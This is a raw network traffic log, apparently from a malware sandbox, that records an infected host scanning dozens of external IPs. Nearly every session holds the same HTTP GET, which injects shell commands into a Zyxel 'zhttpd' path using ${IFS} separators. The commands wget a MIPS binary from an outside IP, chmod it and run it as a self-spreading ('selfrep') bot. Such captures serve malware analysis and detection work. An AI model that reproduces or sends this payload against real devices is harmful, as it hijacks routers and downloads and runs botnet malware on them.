                                                Jan 29, 2024 07:07:44.244574070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3470192.168.2.2336286122.185.52.223443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244579077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3471192.168.2.2336762141.38.11.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244649887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3472192.168.2.235657284.69.47.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244657040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3473192.168.2.235976037.111.219.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244707108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3474192.168.2.2352176167.91.31.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244736910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3475192.168.2.2347058166.66.229.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244775057 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3476192.168.2.2351968147.152.11.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:44.244828939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3477192.168.2.235472469.222.201.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257206917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3478192.168.2.235073283.57.95.213443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257266045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3479192.168.2.2355946140.132.200.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257354975 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3480192.168.2.236076469.143.52.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257419109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3481192.168.2.2341112186.5.189.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257492065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3482192.168.2.236098037.12.164.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257561922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3483192.168.2.235491680.97.41.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257618904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3484192.168.2.2335746158.120.215.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257690907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3485192.168.2.235218088.109.254.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257726908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3486192.168.2.2333752217.219.3.214443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257790089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3487192.168.2.2356238106.150.138.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257864952 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3488192.168.2.234802034.144.8.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257920980 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3489192.168.2.2355906161.220.95.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.257971048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3490192.168.2.235039688.59.29.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258045912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3491192.168.2.2359130119.90.146.85443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258091927 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3492192.168.2.2332990118.49.130.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258156061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3493192.168.2.2336250104.158.189.79443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258487940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3494192.168.2.2334790210.201.29.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258563042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3495192.168.2.2357948176.36.107.11443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258646965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3496192.168.2.2334388102.174.138.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258783102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3497192.168.2.2351756204.192.50.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258784056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3498192.168.2.234214289.232.0.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258862972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3499192.168.2.2341982223.147.88.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.258948088 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3500192.168.2.2337870134.9.188.15443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259001017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3501192.168.2.2344444180.151.38.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259166956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3502192.168.2.233455213.22.204.27443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259227037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3503192.168.2.23375009.216.211.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259270906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3504192.168.2.2335638159.142.200.119443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259349108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3505192.168.2.235413065.130.25.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259439945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3506192.168.2.2347638201.42.186.252443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259478092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3507192.168.2.2343380182.50.153.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259608984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3508192.168.2.234809085.77.30.157443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259711981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3509192.168.2.2334124123.147.136.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259779930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3510192.168.2.2354542166.203.1.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259848118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3511192.168.2.2356150196.214.225.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259896994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3512192.168.2.233590445.165.98.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.259968996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3513192.168.2.2343664188.255.82.175443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260018110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3514192.168.2.2344678113.242.93.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260059118 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3515192.168.2.236024251.165.87.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260104895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3516192.168.2.2356950171.132.199.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260189056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3517192.168.2.234000294.216.28.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260318995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3518192.168.2.2356336128.255.41.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260406017 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3519192.168.2.2333302135.26.111.96443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260440111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3520192.168.2.2351360138.67.27.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260478973 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3521192.168.2.2342046190.24.84.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260677099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3522192.168.2.2357126178.60.70.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260741949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3523192.168.2.2334378133.65.146.71443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260816097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3524192.168.2.233958642.198.3.12443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260885954 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3525192.168.2.2346798174.50.146.199443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.260971069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3526192.168.2.234591273.83.144.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261043072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3527192.168.2.2342072179.154.144.130443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261094093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3528192.168.2.2348998205.253.166.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261255026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3529192.168.2.2351028186.108.159.127443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261320114 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3530192.168.2.236023231.94.49.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261392117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3531192.168.2.2337658223.191.170.210443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261567116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3532192.168.2.2335458213.48.247.68443
                                                TimestampBytes transferredDirectionData
                                                Jan 29, 2024 07:07:45.261620998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                3533192.168.2.2359318198.32.101.208443
                                                TimestampBytes transferredDirectionData
